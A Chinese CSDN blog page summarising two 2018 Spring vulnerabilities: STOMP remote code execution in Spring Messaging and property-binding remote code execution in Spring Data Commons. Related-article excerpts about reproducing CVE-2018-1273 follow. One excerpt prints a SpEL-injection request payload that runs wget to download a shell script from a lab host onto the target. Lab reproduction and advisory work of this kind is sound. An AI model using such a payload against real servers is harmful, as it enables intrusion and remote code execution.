Spring 框架,Spring Data Commons 组件 远程代码执行漏洞

最新推荐文章于 2024-08-07 19:33:53 发布
最新推荐文章于 2024-08-07 19:33:53 发布
阅读量687 收藏
点赞数
分类专栏: java 文章标签: java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67265464/article/details/124396325
版权

Spring 框架,Spring Data Commons 组件 远程代码执行漏洞

2018年4月11日,阿里云云盾应急响应中心监测到Spring框架存在一系列漏洞。
1.Spring 框架 5.0-5.0.4,4.3 - 4.3.15 和更老的不被支持的版本中存在远程代码执行漏洞

允许应用通过Spring-Messaging模块搭建一个不落盘的STOMP消息中介,并在Websocket端点客户端上开启STOMP(Simple Text-Oriented Messaging Protocol) 消息服务。恶意的用户/攻击者可以通过制作特殊构建的消息发送到服务端造成远程代码执行。

2.Spring Data Commons 组件 1.13-1.13.10,2.0-2.0.5 和更老的不被支持的版本中存在一个属性绑定的漏洞

该漏洞是由对特殊元素的不当处理造成的,未经身份验证的远程恶意用户/攻击者可以通过对Spring Data REST支撑的HTTP服务发送特殊构造的请求或者使用Spring Data的基于投射的请求载荷绑定来造成远程代码执行。

m0_67265464
关注
专栏目录
[Java安全]Spring Data Commons之CVE-2018-1273
snowlyzz的博客
02-08 688
从CVE-2018-1273看漏洞分析
Spring框架Data Binding与JDK 9+导致的远程代码执行漏洞复现
Tauil的博客
07-24 795
远程代码执行漏洞起因有可能与对SpringCore所做的更改有关,该更改弃用了使用Java序列化和反序列化的旧“异常克隆”函数。该操作导致Java中使用不受信任的字符串值的反序列化运行远程代码。因为需要设置c1、c2、suffix值,所以攻击机中打开burpsiute进行抓包,修改数据包为。,那么我们可以尝试构造特定的类,从而在目标web目录下创建特定文件。sudodockerps//记住你使用8983端口容器ID,记前两位就行。就可以看到我们输入的命令执行成功了。,该页面的页源代码是。......
Spring框架漏洞(附修复方法)
最新发布
C233333235的博客
08-07 850
SpringJava EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架
Spring Data Commons远程命令执行漏洞复现(CVE-2018-1273)
wutiangui的博客
09-10 860
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)
liangjiao_shou的博客
07-25 148
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架Spring Data CommonsSpring Data下所有子项目共享的基础框架Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)bp进行抓包,然后进行修改。
Spring Data Commons 远程命令执行漏洞
m0_63241485的博客
08-17 518
Spring是一个开源框架,它是为了解决企业应用开发的复杂性而创建的。Spring使用基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅限于服务器端的开发。从简单性、可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。Spring的开发初衷:1、JAVA EE开发应该更加简单。2、使用接口而不是使用类,是更好的编程习惯。Spring将使用接口的复杂度几乎降低到了零。3、为JavaBean提供了一个更好的应用配置框架。...
001--什么是SpringData
weixin_42288943的博客
04-17 175
1.参考网址:https://blog.csdn.net/zgf19930504/article/details/50537198 2.核心内容: ** Spring Data **是Spring 的一个子项目, 旨在统一和简化对各类型持久化存储, 而不拘泥于是关系型数据库还是NoSQL 数据存储。无论是哪种持久化存储, 数据访问对象(或称作为DAO,...
Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)复现
klcyl_0106的博客
05-25 444
1.通过"docker-compose build"和"docker-compose up -d"拉取环境 刚开始直接敲命令docker-compose build出错,最后发现是未启动docker,所以通过systemctl start docker命令启动docker 2.访问服务器ip:8080/users看环境是否成功 3.注册时抓包,并修改成如下数据包: POST /users?page=&size=5 HTTP/1.1 Host: localhost:8080 Connection:
spring-data-commons-2.0.6.RELEASE-API文档-中文版.zip
07-14
赠送源代码spring-data-commons-2.0.6.RELEASE-sources.jar; 赠送Maven依赖信息文件:spring-data-commons-2.0.6.RELEASE.pom; 包含翻译后的API文档:spring-data-commons-2.0.6.RELEASE-javadoc-API文档-中文...
spring-data-commons-2.3.9.RELEASE-API文档-中文版.zip
07-13
赠送源代码spring-data-commons-2.3.9.RELEASE-sources.jar; 赠送Maven依赖信息文件:spring-data-commons-2.3.9.RELEASE.pom; 包含翻译后的API文档:spring-data-commons-2.3.9.RELEASE-javadoc-API文档-中文...
spring-data-commons-1.13.4.RELEASE.jar
07-03
spring-data-commons-1.13.4.RELEASE.jar
spring-data-commons-2.0.9.RELEASE-API文档-中英对照版.zip
06-12
赠送源代码spring-data-commons-2.0.9.RELEASE-sources.jar; 赠送Maven依赖信息文件:spring-data-commons-2.0.9.RELEASE.pom; 包含翻译后的API文档:spring-data-commons-2.0.9.RELEASE-javadoc-API文档-中文...
spring-data-commons-2.5.5-API文档-中文版.zip
06-04
赠送源代码spring-data-commons-2.5.5-sources.jar; 赠送Maven依赖信息文件:spring-data-commons-2.5.5.pom; 包含翻译后的API文档:spring-data-commons-2.5.5-javadoc-API文档-中文(简体)版.zip; Maven坐标:...
spring(CVE-2018-1273)远程代码执行漏洞复现
热门推荐
勤劳的码农的博客
03-12 1万+
Spring DataSpring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
Spring Data Commons远程命令执行(CVE-2018-1273)
Lucky1youzi的博客
01-02 277
渗透
Spring Data Commons 远程命令执行漏洞 CVE-2018-1273 漏洞复现
ADummy的博客
03-02 281
Spring Data Commons 远程命令执行漏洞(CVE-2018-1273) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>SpEL命令执行 0x01漏洞介绍 ​ Spring Data是一个用于简化数据库访问,并支持云服务的开源框架Spring Data CommonsSpring Data下所有子项目共享的基础框架Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达
Spring Data Commons 参考指南
- 介绍: Spring Data Repositories是框架的核心组件,它们充当了应用程序代码与数据存储之间的桥梁,允许开发者以声明式的方式定义数据操作。 - 核心概念: 仓库接口基于泛型,允许开发者声明他们想要执行的操作,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值